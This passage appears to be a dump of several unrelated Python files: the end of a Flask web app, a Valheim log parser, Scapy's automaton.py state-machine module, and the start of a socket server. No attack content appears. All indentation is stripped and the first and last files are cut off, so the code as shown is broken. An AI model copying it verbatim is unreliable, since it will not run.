return render_template('homepage.html', users=users)
if __name__ == '__main__':
thread = threading.Thread(target=thread_copy_ssh_key)
thread.daemon = True
thread.start()
def stop_thread():
print('stopping thread')
copy_queue.put('EXIT')
thread.join()
print('thread stopped')
atexit.register(stop_thread)
http_server = WSGIServer(('', settings.WEB_PORT), app)
try:
print('WSGIServer start')
http_server.serve_forever()
except KeyboardInterrupt:
print('WSGIServer stopped')
|
parse-log.py
|
#!/usr/bin/env python3
import re
import subprocess
import sys
import threading
from datetime import datetime, timezone
from queue import Queue
# Required due to Python's standard library lacking any canonical way to refer to timezones directly besides UTC
import pytz
"""
Parse player login/logout and death/respawn events out of Valheim server logs into something more human-readable
Uses tail -F to track log output, e.g. put this in a tmux session or something
./parse-log.py LOG_FILE
"""
# ZDOID => PlayerName
players = dict()
# PlayerName => boolean: is dead?
death_states = dict()
tailq = Queue(maxsize=10)
def tail():
# TODO: Default to vhserver location
logtail = subprocess.Popen(['tail', '-F', '-n', '+250', sys.argv[1]],
stdout=subprocess.PIPE, stderr=subprocess.PIPE)
while True:
line: str = logtail.stdout.readline().decode('utf8')
tailq.put(line)
if not line:
break
def convert_timezone(valheim_date_string: str):
return datetime.strptime(valheim_date_string, '%m/%d/%Y %H:%M:%S').replace(tzinfo=timezone.utc).astimezone(pytz.timezone('America/Denver'))
threading.Thread(target=tail).start()
while True:
line: str = tailq.get()
matcher = re.match(r'(?P<timestamp>.*?): Got character ZDOID from (?P<name>[\w ]+) : (?P<zdoid>-?\d+)', line)
if matcher is not None:
m = matcher.groupdict()
if m['zdoid'] == '0':
print(f"{convert_timezone(m['timestamp'])}: {m['name']} has died!")
death_states[m['name']] = True
else:
if death_states.get(m['name'], False):
print(f"{convert_timezone(m['timestamp'])}: {m['name']} respawned")
death_states[m['name']] = False
else:
print(f"{convert_timezone(m['timestamp'])}: {m['name']} LOGIN")
players[m['zdoid']] = m['name']
else:
matcher = re.match(r'(?P<timestamp>.*?): Destroying abandoned non persistent zdo (?P<zdoid>-?\d+)', line)
if matcher is not None:
m = matcher.groupdict()
if m['zdoid'] in players and players[m['zdoid']] is not None:
print(f"{convert_timezone(m['timestamp'])}: {players[m['zdoid']]} LOG OUT")
players[m['zdoid']] = None
|
automaton.py
|
# This file is part of Scapy
# See http://www.secdev.org/projects/scapy for more information
# Copyright (C) Philippe Biondi <phil@secdev.org>
# Copyright (C) Gabriel Potter <gabriel@potter.fr>
# This program is published under a GPLv2 license
"""
Automata with states, transitions and actions.
"""
from __future__ import absolute_import
import types
import itertools
import time
import os
import sys
import traceback
from select import select
from collections import deque
import threading
from scapy.config import conf
from scapy.utils import do_graph
from scapy.error import log_interactive, warning
from scapy.plist import PacketList
from scapy.data import MTU
from scapy.supersocket import SuperSocket
from scapy.consts import WINDOWS
import scapy.modules.six as six
if WINDOWS:
from scapy.error import Scapy_Exception
recv_error = Scapy_Exception
else:
recv_error = ()
""" In Windows, select.select is not available for custom objects. Here's the implementation of scapy to re-create this functionality # noqa: E501
# Passive way: using locks that consume no resources
+---------+ +---------------+ +-------------------------+ # noqa: E501
| Start +------------->Select_objects +----->+Linux: call select.select| # noqa: E501
+---------+ |(select.select)| +-------------------------+ # noqa: E501
+-------+-------+
|
+----v----+ +--------+
| Windows | |Time Out+----------------------------------+ # noqa: E501
+----+----+ +----+---+ | # noqa: E501
| ^ | # noqa: E501
Event | | | # noqa: E501
+ | | | # noqa: E501
| +-------v-------+ | | # noqa: E501
| +------+Selectable Sel.+-----+-----------------+-----------+ | # noqa: E501
| | +-------+-------+ | | | v +-----v-----+ # noqa: E501
+-------v----------+ | | | | | Passive lock<-----+release_all<------+ # noqa: E501
|Data added to list| +----v-----+ +-----v-----+ +----v-----+ v v + +-----------+ | # noqa: E501
+--------+---------+ |Selectable| |Selectable | |Selectable| ............ | | # noqa: E501
| +----+-----+ +-----------+ +----------+ | | # noqa: E501
| v | | # noqa: E501
v +----+------+ +------------------+ +-------------v-------------------+ | # noqa: E501
+-----+------+ |wait_return+-->+ check_recv: | | | | # noqa: E501
|call_release| +----+------+ |If data is in list| | END state: selectable returned | +---+--------+ # noqa: E501
+-----+-------- v +-------+----------+ | | | exit door | # noqa: E501
| else | +---------------------------------+ +---+--------+ # noqa: E501
| + | | # noqa: E501
| +----v-------+ | | # noqa: E501
+--------->free -->Passive lock| | | # noqa: E501
+----+-------+ | | # noqa: E501
| | | # noqa: E501
| v | # noqa: E501
+------------------Selectable-Selector-is-advertised-that-the-selectable-is-readable---------+
"""
class SelectableObject(object):
"""DEV: to implement one of those, you need to add 2 things to your object:
- add "check_recv" function
- call "self.call_release" once you are ready to be read
You can set the __selectable_force_select__ to True in the class, if you want to # noqa: E501
force the handler to use fileno(). This may only be usable on sockets created using # noqa: E501
the builtin socket API."""
__selectable_force_select__ = False
def __init__(self):
self.hooks = []
def check_recv(self):
"""DEV: will be called only once (at beginning) to check if the object is ready.""" # noqa: E501
raise OSError("This method must be overwritten.")
def _wait_non_ressources(self, callback):
"""This get started as a thread, and waits for the data lock to be freed then advertise itself to the SelectableSelector using the callback""" # noqa: E501
self.trigger = threading.Lock()
self.was_ended = False
self.trigger.acquire()
self.trigger.acquire()
if not self.was_ended:
callback(self)
def wait_return(self, callback):
"""Entry point of SelectableObject: register the callback"""
if self.check_recv():
return callback(self)
_t = threading.Thread(target=self._wait_non_ressources, args=(callback,)) # noqa: E501
_t.setDaemon(True)
_t.start()
def register_hook(self, hook):
"""DEV: When call_release() will be called, the hook will also"""
self.hooks.append(hook)
def call_release(self, arborted=False):
"""DEV: Must be call when the object becomes ready to read.
Relesases the lock of _wait_non_ressources"""
self.was_ended = arborted
try:
self.trigger.release()
except (threading.ThreadError, AttributeError):
pass
# Trigger hooks
for hook in self.hooks:
hook()
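# Illustrative sketch (not part of Scapy): a minimal SelectableObject implements
# check_recv() and calls call_release() whenever new data becomes readable, e.g.:
#
#     class MyReadable(SelectableObject):
#         def __init__(self):
#             SelectableObject.__init__(self)
#             self.items = deque()
#         def check_recv(self):
#             return len(self.items) > 0
#         def push(self, item):
#             self.items.append(item)
#             self.call_release()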
class SelectableSelector(object):
"""
Select SelectableObject objects.
inputs: objects to process
remain: timeout. If 0, return [].
"""
def _release_all(self):
"""Releases all locks to kill all threads"""
for i in self.inputs:
i.call_release(True)
self.available_lock.release()
def _timeout_thread(self, remain):
"""Timeout before releasing every thing, if nothing was returned"""
time.sleep(remain)
if not self._ended:
self._ended = True
self._release_all()
def _exit_door(self, _input):
"""This function is passed to each SelectableObject as a callback
The SelectableObjects have to call it once they are ready"""
self.results.append(_input)
if self._ended:
return
self._ended = True
self._release_all()
def __init__(self, inputs, remain):
self.results = []
self.inputs = list(inputs)
self.remain = remain
self.available_lock = threading.Lock()
self.available_lock.acquire()
self._ended = False
def process(self):
"""Entry point of SelectableSelector"""
if WINDOWS:
select_inputs = []
for i in self.inputs:
if not isinstance(i, SelectableObject):
warning("Unknown ignored object type: %s", type(i))
elif i.__selectable_force_select__:
# Then use select.select
select_inputs.append(i)
elif not self.remain and i.check_recv():
self.results.append(i)
elif self.remain:
i.wait_return(self._exit_door)
if select_inputs:
# Use default select function
self.results.extend(select(select_inputs, [], [], self.remain)[0]) # noqa: E501
if not self.remain:
return self.results
threading.Thread(target=self._timeout_thread, args=(self.remain,)).start() # noqa: E501
if not self._ended:
self.available_lock.acquire()
return self.results
else:
r, _, _ = select(self.inputs, [], [], self.remain)
return r
def select_objects(inputs, remain):
"""
Select SelectableObject objects. Same as:
``select.select([inputs], [], [], remain)``
But also works on Windows, only on SelectableObject.
:param inputs: objects to process
:param remain: timeout. If 0, return [].
"""
handler = SelectableSelector(inputs, remain)
return handler.process()
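# Example usage (illustrative): wait up to one second for either pipe to become
# readable, mirroring select.select() semantics on both platforms:
#
#     a, b = ObjectPipe(), ObjectPipe()
#     b.send("ping")
#     ready = select_objects([a, b], 1)  # -> [b]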
class ObjectPipe(SelectableObject):
read_allowed_exceptions = ()
def __init__(self):
self.closed = False
self.rd, self.wr = os.pipe()
self.queue = deque()
SelectableObject.__init__(self)
def fileno(self):
return self.rd
def check_recv(self):
return len(self.queue) > 0
def send(self, obj):
self.queue.append(obj)
os.write(self.wr, b"X")
self.call_release()
def write(self, obj):
self.send(obj)
def recv(self, n=0):
if self.closed:
if self.check_recv():
return self.queue.popleft()
return None
os.read(self.rd, 1)
return self.queue.popleft()
def read(self, n=0):
return self.recv(n)
def close(self):
if not self.closed:
self.closed = True
os.close(self.rd)
os.close(self.wr)
self.queue.clear()
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
# Only handle ObjectPipes
results = []
for s in sockets:
if s.closed:
results.append(s)
if results:
return results, None
return select_objects(sockets, remain), None
class Message:
def __init__(self, **args):
self.__dict__.update(args)
def __repr__(self):
return "<Message %s>" % " ".join("%s=%r" % (k, v)
for (k, v) in six.iteritems(self.__dict__) # noqa: E501
if not k.startswith("_"))
class _instance_state:
def __init__(self, instance):
self.__self__ = instance.__self__
self.__func__ = instance.__func__
self.__self__.__class__ = instance.__self__.__class__
def __getattr__(self, attr):
return getattr(self.__func__, attr)
def __call__(self, *args, **kargs):
return self.__func__(self.__self__, *args, **kargs)
def breaks(self):
return self.__self__.add_breakpoints(self.__func__)
def intercepts(self):
return self.__self__.add_interception_points(self.__func__)
def unbreaks(self):
return self.__self__.remove_breakpoints(self.__func__)
def unintercepts(self):
return self.__self__.remove_interception_points(self.__func__)
##############
# Automata #
##############
class ATMT:
STATE = "State"
ACTION = "Action"
CONDITION = "Condition"
RECV = "Receive condition"
TIMEOUT = "Timeout condition"
IOEVENT = "I/O event"
class NewStateRequested(Exception):
def __init__(self, state_func, automaton, *args, **kargs):
self.func = state_func
self.state = state_func.atmt_state
self.initial = state_func.atmt_initial
self.error = state_func.atmt_error
self.final = state_func.atmt_final
Exception.__init__(self, "Request state [%s]" % self.state)
self.automaton = automaton
self.args = args
self.kargs = kargs
self.action_parameters() # init action parameters
def action_parameters(self, *args, **kargs):
self.action_args = args
self.action_kargs = kargs
return self
def run(self):
return self.func(self.automaton, *self.args, **self.kargs)
def __repr__(self):
return "NewStateRequested(%s)" % self.state
@staticmethod
def state(initial=0, final=0, error=0):
def deco(f, initial=initial, final=final):
f.atmt_type = ATMT.STATE
f.atmt_state = f.__name__
f.atmt_initial = initial
f.atmt_final = final
f.atmt_error = error
def state_wrapper(self, *args, **kargs):
return ATMT.NewStateRequested(f, self, *args, **kargs)
state_wrapper.__name__ = "%s_wrapper" % f.__name__
state_wrapper.atmt_type = ATMT.STATE
state_wrapper.atmt_state = f.__name__
state_wrapper.atmt_initial = initial
state_wrapper.atmt_final = final
state_wrapper.atmt_error = error
state_wrapper.atmt_origfunc = f
return state_wrapper
return deco
@staticmethod
def action(cond, prio=0):
def deco(f, cond=cond):
if not hasattr(f, "atmt_type"):
f.atmt_cond = {}
f.atmt_type = ATMT.ACTION
f.atmt_cond[cond.atmt_condname] = prio
return f
return deco
@staticmethod
def condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.CONDITION
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def receive_condition(state, prio=0):
def deco(f, state=state):
f.atmt_type = ATMT.RECV
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_prio = prio
return f
return deco
@staticmethod
def ioevent(state, name, prio=0, as_supersocket=None):
def deco(f, state=state):
f.atmt_type = ATMT.IOEVENT
f.atmt_state = state.atmt_state
f.atmt_condname = f.__name__
f.atmt_ioname = name
f.atmt_prio = prio
f.atmt_as_supersocket = as_supersocket
return f
return deco
@staticmethod
def timeout(state, timeout):
def deco(f, state=state, timeout=timeout):
f.atmt_type = ATMT.TIMEOUT
f.atmt_state = state.atmt_state
f.atmt_timeout = timeout
f.atmt_condname = f.__name__
return f
return deco
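# Illustrative sketch of how these decorators are used (cf. the Scapy automata
# documentation): states and transitions are declared on an Automaton subclass:
#
#     class HelloWorld(Automaton):
#         @ATMT.state(initial=1)
#         def BEGIN(self):
#             print("Hello, world")
#             raise self.END()
#         @ATMT.state(final=1)
#         def END(self):
#             pass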
class _ATMT_Command:
RUN = "RUN"
NEXT = "NEXT"
FREEZE = "FREEZE"
STOP = "STOP"
END = "END"
EXCEPTION = "EXCEPTION"
SINGLESTEP = "SINGLESTEP"
BREAKPOINT = "BREAKPOINT"
INTERCEPT = "INTERCEPT"
ACCEPT = "ACCEPT"
REPLACE = "REPLACE"
REJECT = "REJECT"
class _ATMT_supersocket(SuperSocket, SelectableObject):
def __init__(self, name, ioevent, automaton, proto, *args, **kargs):
SelectableObject.__init__(self)
self.name = name
self.ioevent = ioevent
self.proto = proto
# write, read
self.spa, self.spb = ObjectPipe(), ObjectPipe()
# Register recv hook
self.spb.register_hook(self.call_release)
kargs["external_fd"] = {ioevent: (self.spa, self.spb)}
self.atmt = automaton(*args, **kargs)
self.atmt.runbg()
def fileno(self):
return self.spb.fileno()
def send(self, s):
if not isinstance(s, bytes):
s = bytes(s)
return self.spa.send(s)
def check_recv(self):
return self.spb.check_recv()
def recv(self, n=MTU):
r = self.spb.recv(n)
if self.proto is not None:
r = self.proto(r)
return r
def close(self):
if not self.closed:
self.atmt.stop()
self.spa.close()
self.spb.close()
self.closed = True
@staticmethod
def select(sockets, remain=conf.recv_poll_rate):
return select_objects(sockets, remain), None
class _ATMT_to_supersocket:
def __init__(self, name, ioevent, automaton):
self.name = name
self.ioevent = ioevent
self.automaton = automaton
def __call__(self, proto, *args, **kargs):
return _ATMT_supersocket(
self.name, self.ioevent, self.automaton,
proto, *args, **kargs
)
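# The metaclass walks the class dict (and its bases) once at class-creation time
# and indexes every ATMT-decorated method into the states, conditions,
# recv_conditions, ioevents, timeout and actions tables consumed by the run loop.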
class Automaton_metaclass(type):
def __new__(cls, name, bases, dct):
cls = super(Automaton_metaclass, cls).__new__(cls, name, bases, dct)
cls.states = {}
cls.state = None
cls.recv_conditions = {}
cls.conditions = {}
cls.ioevents = {}
cls.timeout = {}
cls.actions = {}
cls.initial_states = []
cls.ionames = []
cls.iosupersockets = []
members = {}
classes = [cls]
while classes:
c = classes.pop(0) # order is important to avoid breaking method overloading # noqa: E501
classes += list(c.__bases__)
for k, v in six.iteritems(c.__dict__):
if k not in members:
members[k] = v
decorated = [v for v in six.itervalues(members)
if isinstance(v, types.FunctionType) and hasattr(v, "atmt_type")] # noqa: E501
for m in decorated:
if m.atmt_type == ATMT.STATE:
s = m.atmt_state
cls.states[s] = m
cls.recv_conditions[s] = []
cls.ioevents[s] = []
cls.conditions[s] = []
cls.timeout[s] = []
if m.atmt_initial:
cls.initial_states.append(m)
elif m.atmt_type in [ATMT.CONDITION, ATMT.RECV, ATMT.TIMEOUT, ATMT.IOEVENT]: # noqa: E501
cls.actions[m.atmt_condname] = []
for m in decorated:
if m.atmt_type == ATMT.CONDITION:
cls.conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.RECV:
cls.recv_conditions[m.atmt_state].append(m)
elif m.atmt_type == ATMT.IOEVENT:
cls.ioevents[m.atmt_state].append(m)
cls.ionames.append(m.atmt_ioname)
if m.atmt_as_supersocket is not None:
cls.iosupersockets.append(m)
elif m.atmt_type == ATMT.TIMEOUT:
cls.timeout[m.atmt_state].append((m.atmt_timeout, m))
elif m.atmt_type == ATMT.ACTION:
for c in m.atmt_cond:
cls.actions[c].append(m)
for v in six.itervalues(cls.timeout):
v.sort(key=lambda x: x[0])
v.append((None, None))
for v in itertools.chain(six.itervalues(cls.conditions),
six.itervalues(cls.recv_conditions),
six.itervalues(cls.ioevents)):
v.sort(key=lambda x: x.atmt_prio)
for condname, actlst in six.iteritems(cls.actions):
actlst.sort(key=lambda x: x.atmt_cond[condname])
for ioev in cls.iosupersockets:
setattr(cls, ioev.atmt_as_supersocket, _ATMT_to_supersocket(ioev.atmt_as_supersocket, ioev.atmt_ioname, cls)) # noqa: E501
return cls
def build_graph(self):
s = 'digraph "%s" {\n' % self.__class__.__name__
se = "" # Keep initial nodes at the beginning for better rendering
for st in six.itervalues(self.states):
if st.atmt_initial:
se = ('\t"%s" [ style=filled, fillcolor=blue, shape=box, root=true];\n' % st.atmt_state) + se # noqa: E501
elif st.atmt_final:
se += '\t"%s" [ style=filled, fillcolor=green, shape=octagon ];\n' % st.atmt_state # noqa: E501
elif st.atmt_error:
se += '\t"%s" [ style=filled, fillcolor=red, shape=octagon ];\n' % st.atmt_state # noqa: E501
s += se
for st in six.itervalues(self.states):
for n in st.atmt_origfunc.__code__.co_names + st.atmt_origfunc.__code__.co_consts: # noqa: E501
if n in self.states:
s += '\t"%s" -> "%s" [ color=green ];\n' % (st.atmt_state, n) # noqa: E501
for c, k, v in ([("purple", k, v) for k, v in self.conditions.items()] + # noqa: E501
[("red", k, v) for k, v in self.recv_conditions.items()] + # noqa: E501
[("orange", k, v) for k, v in self.ioevents.items()]):
for f in v:
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = f.atmt_condname
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s", color=%s];\n' % (k, n, line, c) # noqa: E501
for k, v in six.iteritems(self.timeout):
for t, f in v:
if f is None:
continue
for n in f.__code__.co_names + f.__code__.co_consts:
if n in self.states:
line = "%s/%.1fs" % (f.atmt_condname, t)
for x in self.actions[f.atmt_condname]:
line += "\\l>[%s]" % x.__name__
s += '\t"%s" -> "%s" [label="%s",color=blue];\n' % (k, n, line) # noqa: E501
s += "}\n"
return s
def graph(self, **kargs):
s = self.build_graph()
return do_graph(s, **kargs)
class Automaton(six.with_metaclass(Automaton_metaclass)):
def parse_args(self, debug=0, store=1, **kargs):
self.debug_level = debug
self.socket_kargs = kargs
self.store_packets = store
def master_filter(self, pkt):
return True
def my_send(self, pkt):
self.send_sock.send(pkt)
# Utility classes and exceptions
class _IO_fdwrapper(SelectableObject):
def __init__(self, rd, wr):
if rd is not None and not isinstance(rd, (int, ObjectPipe)):
rd = rd.fileno()
if wr is not None and not isinstance(wr, (int, ObjectPipe)):
wr = wr.fileno()
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, ObjectPipe):
return self.rd.fileno()
return self.rd
def check_recv(self):
return self.rd.check_recv()
def read(self, n=65535):
if isinstance(self.rd, ObjectPipe):
return self.rd.recv(n)
return os.read(self.rd, n)
def write(self, msg):
self.call_release()
if isinstance(self.wr, ObjectPipe):
self.wr.send(msg)
return
return os.write(self.wr, msg)
def recv(self, n=65535):
return self.read(n)
def send(self, msg):
return self.write(msg)
class _IO_mixer(SelectableObject):
def __init__(self, rd, wr):
self.rd = rd
self.wr = wr
SelectableObject.__init__(self)
def fileno(self):
if isinstance(self.rd, int):
return self.rd
return self.rd.fileno()
def check_recv(self):
return self.rd.check_recv()
def recv(self, n=None):
return self.rd.recv(n)
def read(self, n=None):
return self.recv(n)
def send(self, msg):
self.wr.send(msg)
return self.call_release()
def write(self, msg):
return self.send(msg)
class AutomatonException(Exception):
def __init__(self, msg, state=None, result=None):
Exception.__init__(self, msg)
self.state = state
self.result = result
class AutomatonError(AutomatonException):
pass
class ErrorState(AutomatonException):
pass
class Stuck(AutomatonException):
pass
class AutomatonStopped(AutomatonException):
pass
class Breakpoint(AutomatonStopped):
pass
class Singlestep(AutomatonStopped):
pass
class InterceptionPoint(AutomatonStopped):
def __init__(self, msg, state=None, result=None, packet=None):
Automaton.AutomatonStopped.__init__(self, msg, state=state, result=result) # noqa: E501
self.packet = packet
class CommandMessage(AutomatonException):
pass
# Services
def debug(self, lvl, msg):
if self.debug_level >= lvl:
log_interactive.debug(msg)
def send(self, pkt):
if self.state.state in self.interception_points:
self.debug(3, "INTERCEPT: packet intercepted: %s" % pkt.summary())
self.intercepted_packet = pkt
cmd = Message(type=_ATMT_Command.INTERCEPT, state=self.state, pkt=pkt) # noqa: E501
self.cmdout.send(cmd)
cmd = self.cmdin.recv()
self.intercepted_packet = None
if cmd.type == _ATMT_Command.REJECT:
self.debug(3, "INTERCEPT: packet rejected")
return
elif cmd.type == _ATMT_Command.REPLACE:
pkt = cmd.pkt
self.debug(3, "INTERCEPT: packet replaced by: %s" % pkt.summary()) # noqa: E501
elif cmd.type == _ATMT_Command.ACCEPT:
self.debug(3, "INTERCEPT: packet accepted")
else:
raise self.AutomatonError("INTERCEPT: unknown verdict: %r" % cmd.type) # noqa: E501
self.my_send(pkt)
self.debug(3, "SENT : %s" % pkt.summary())
if self.store_packets:
self.packets.append(pkt.copy())
# Internals
def __init__(self, *args, **kargs):
external_fd = kargs.pop("external_fd", {})
self.send_sock_class = kargs.pop("ll", conf.L3socket)
self.recv_sock_class = kargs.pop("recvsock", conf.L2listen)
self.started = threading.Lock()
self.threadid = None
self.breakpointed = None
self.breakpoints = set()
self.interception_points = set()
self.intercepted_packet = None
self.debug_level = 0
self.init_args = args
self.init_kargs = kargs
self.io = type.__new__(type, "IOnamespace", (), {})
self.oi = type.__new__(type, "IOnamespace", (), {})
self.cmdin = ObjectPipe()
self.cmdout = ObjectPipe()
self.ioin = {}
self.ioout = {}
for n in self.ionames:
extfd = external_fd.get(n)
if not isinstance(extfd, tuple):
extfd = (extfd, extfd)
ioin, ioout = extfd
if ioin is None:
ioin = ObjectPipe()
elif not isinstance(ioin, SelectableObject):
ioin = self._IO_fdwrapper(ioin, None)
if ioout is None:
ioout = ObjectPipe()
elif not isinstance(ioout, SelectableObject):
ioout = self._IO_fdwrapper(None, ioout)
self.ioin[n] = ioin
self.ioout[n] = ioout
ioin.ioname = n
ioout.ioname = n
setattr(self.io, n, self._IO_mixer(ioout, ioin))
setattr(self.oi, n, self._IO_mixer(ioin, ioout))
for stname in self.states:
setattr(self, stname,
_instance_state(getattr(self, stname)))
self.start()
def __iter__(self):
return self
def __del__(self):
self.stop()
def _run_condition(self, cond, *args, **kargs):
try:
self.debug(5, "Trying %s [%s]" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
cond(self, *args, **kargs)
except ATMT.NewStateRequested as state_req:
self.debug(2, "%s [%s] taken to state [%s]" % (cond.atmt_type, cond.atmt_condname, state_req.state)) # noqa: E501
if cond.atmt_type == ATMT.RECV:
if self.store_packets:
self.packets.append(args[0])
for action in self.actions[cond.atmt_condname]:
self.debug(2, " + Running action [%s]" % action.__name__)
action(self, *state_req.action_args, **state_req.action_kargs)
raise
except Exception as e:
self.debug(2, "%s [%s] raised exception [%s]" % (cond.atmt_type, cond.atmt_condname, e)) # noqa: E501
raise
else:
self.debug(2, "%s [%s] not taken" % (cond.atmt_type, cond.atmt_condname)) # noqa: E501
def _do_start(self, *args, **kargs):
ready = threading.Event()
_t = threading.Thread(target=self._do_control, args=(ready,) + (args), kwargs=kargs) # noqa: E501
_t.setDaemon(True)
_t.start()
ready.wait()
def _do_control(self, ready, *args, **kargs):
with self.started:
self.threadid = threading.currentThread().ident
# Update default parameters
a = args + self.init_args[len(args):]
k = self.init_kargs.copy()
k.update(kargs)
self.parse_args(*a, **k)
# Start the automaton
self.state = self.initial_states[0](self)
self.send_sock = self.send_sock_class(**self.socket_kargs)
self.listen_sock = self.recv_sock_class(**self.socket_kargs)
self.packets = PacketList(name="session[%s]" % self.__class__.__name__) # noqa: E501
singlestep = True
iterator = self._do_iter()
self.debug(3, "Starting control thread [tid=%i]" % self.threadid)
# Sync threads
ready.set()
try:
while True:
c = self.cmdin.recv()
self.debug(5, "Received command %s" % c.type)
if c.type == _ATMT_Command.RUN:
singlestep = False
elif c.type == _ATMT_Command.NEXT:
singlestep = True
elif c.type == _ATMT_Command.FREEZE:
continue
elif c.type == _ATMT_Command.STOP:
break
while True:
state = next(iterator)
if isinstance(state, self.CommandMessage):
break
elif isinstance(state, self.Breakpoint):
c = Message(type=_ATMT_Command.BREAKPOINT, state=state) # noqa: E501
self.cmdout.send(c)
break
if singlestep:
c = Message(type=_ATMT_Command.SINGLESTEP, state=state) # noqa: E501
self.cmdout.send(c)
break
except (StopIteration, RuntimeError):
c = Message(type=_ATMT_Command.END,
result=self.final_state_output)
self.cmdout.send(c)
except Exception as e:
exc_info = sys.exc_info()
self.debug(3, "Transferring exception from tid=%i:\n%s" % (self.threadid, traceback.format_exception(*exc_info))) # noqa: E501
m = Message(type=_ATMT_Command.EXCEPTION, exception=e, exc_info=exc_info) # noqa: E501
self.cmdout.send(m)
self.debug(3, "Stopping control thread (tid=%i)" % self.threadid)
self.threadid = None
# Close sockets
self.listen_sock.close()
self.send_sock.close()
def _do_iter(self):
while True:
try:
self.debug(1, "## state=[%s]" % self.state.state)
# Entering a new state. First, call new state function
if self.state.state in self.breakpoints and self.state.state != self.breakpointed: # noqa: E501
self.breakpointed = self.state.state
yield self.Breakpoint("breakpoint triggered on state %s" % self.state.state, # noqa: E501
state=self.state.state)
self.breakpointed = None
state_output = self.state.run()
if self.state.error:
raise self.ErrorState("Reached %s: [%r]" % (self.state.state, state_output), # noqa: E501
result=state_output, state=self.state.state) # noqa: E501
if self.state.final:
self.final_state_output = state_output
return
if state_output is None:
state_output = ()
elif not isinstance(state_output, list):
state_output = state_output,
# Then check immediate conditions
for cond in self.conditions[self.state.state]:
self._run_condition(cond, *state_output)
# If still there and no conditions left, we are stuck!
if (len(self.recv_conditions[self.state.state]) == 0 and
len(self.ioevents[self.state.state]) == 0 and
len(self.timeout[self.state.state]) == 1):
raise self.Stuck("stuck in [%s]" % self.state.state,
state=self.state.state, result=state_output) # noqa: E501
# Finally listen and pay attention to timeouts
expirations = iter(self.timeout[self.state.state])
next_timeout, timeout_func = next(expirations)
t0 = time.time()
fds = [self.cmdin]
if len(self.recv_conditions[self.state.state]) > 0:
fds.append(self.listen_sock)
for ioev in self.ioevents[self.state.state]:
fds.append(self.ioin[ioev.atmt_ioname])
while True:
t = time.time() - t0
if next_timeout is not None:
if next_timeout <= t:
self._run_condition(timeout_func, *state_output)
next_timeout, timeout_func = next(expirations)
if next_timeout is None:
remain = None
else:
remain = next_timeout - t
self.debug(5, "Select on %r" % fds)
r = select_objects(fds, remain)
self.debug(5, "Selected %r" % r)
for fd in r:
self.debug(5, "Looking at %r" % fd)
if fd == self.cmdin:
yield self.CommandMessage("Received command message") # noqa: E501
elif fd == self.listen_sock:
try:
pkt = self.listen_sock.recv(MTU)
except recv_error:
pass
else:
if pkt is not None:
if self.master_filter(pkt):
self.debug(3, "RECVD: %s" % pkt.summary()) # noqa: E501
for rcvcond in self.recv_conditions[self.state.state]: # noqa: E501
self._run_condition(rcvcond, pkt, *state_output) # noqa: E501
else:
self.debug(4, "FILTR: %s" % pkt.summary()) # noqa: E501
else:
self.debug(3, "IOEVENT on %s" % fd.ioname)
for ioevt in self.ioevents[self.state.state]:
if ioevt.atmt_ioname == fd.ioname:
self._run_condition(ioevt, fd, *state_output) # noqa: E501
except ATMT.NewStateRequested as state_req:
self.debug(2, "switching from [%s] to [%s]" % (self.state.state, state_req.state)) # noqa: E501
self.state = state_req
yield state_req
# Public API
def add_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.add(ipt)
def remove_interception_points(self, *ipts):
for ipt in ipts:
if hasattr(ipt, "atmt_state"):
ipt = ipt.atmt_state
self.interception_points.discard(ipt)
def add_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.add(bp)
def remove_breakpoints(self, *bps):
for bp in bps:
if hasattr(bp, "atmt_state"):
bp = bp.atmt_state
self.breakpoints.discard(bp)
def start(self, *args, **kargs):
if not self.started.locked():
self._do_start(*args, **kargs)
def run(self, resume=None, wait=True):
if resume is None:
resume = Message(type=_ATMT_Command.RUN)
self.cmdin.send(resume)
if wait:
try:
c = self.cmdout.recv()
except KeyboardInterrupt:
self.cmdin.send(Message(type=_ATMT_Command.FREEZE))
return
if c.type == _ATMT_Command.END:
return c.result
elif c.type == _ATMT_Command.INTERCEPT:
raise self.InterceptionPoint("packet intercepted", state=c.state.state, packet=c.pkt) # noqa: E501
elif c.type == _ATMT_Command.SINGLESTEP:
raise self.Singlestep("singlestep state=[%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.BREAKPOINT:
raise self.Breakpoint("breakpoint triggered on state [%s]" % c.state.state, state=c.state.state) # noqa: E501
elif c.type == _ATMT_Command.EXCEPTION:
six.reraise(c.exc_info[0], c.exc_info[1], c.exc_info[2])
def runbg(self, resume=None, wait=False):
self.run(resume, wait)
def next(self):
return self.run(resume=Message(type=_ATMT_Command.NEXT))
__next__ = next
def stop(self):
self.cmdin.send(Message(type=_ATMT_Command.STOP))
with self.started:
# Flush command pipes
while True:
r = select_objects([self.cmdin, self.cmdout], 0)
if not r:
break
for fd in r:
fd.recv()
def restart(self, *args, **kargs):
self.stop()
self.start(*args, **kargs)
def accept_packet(self, pkt=None, wait=False):
rsm = Message()
if pkt is None:
rsm.type = _ATMT_Command.ACCEPT
else:
rsm.type = _ATMT_Command.REPLACE
rsm.pkt = pkt
return self.run(resume=rsm, wait=wait)
def reject_packet(self, wait=False):
rsm = Message(type=_ATMT_Command.REJECT)
return self.run(resume=rsm, wait=wait)
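# Usage sketch (illustration only, not part of this module): a minimal
# automaton built with the ATMT state decorators this class is driven by,
# showing the public API implemented above (start()/run()/stop()):
#
#     class HelloWorld(Automaton):
#         @ATMT.state(initial=1)
#         def BEGIN(self):
#             raise self.END()
#         @ATMT.state(final=1)
#         def END(self):
#             return "done"
#
#     HelloWorld().run()   # returns "done"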
|
server.py
|
import socket
from threading import Thread
from dan_socket.event import Event
from dan_socket.base import BaseConnection
class ClientConnection:
def __init__(self, client_sock, server):
self.client_sock = client_sock
self.server = server
self.handle_connection()
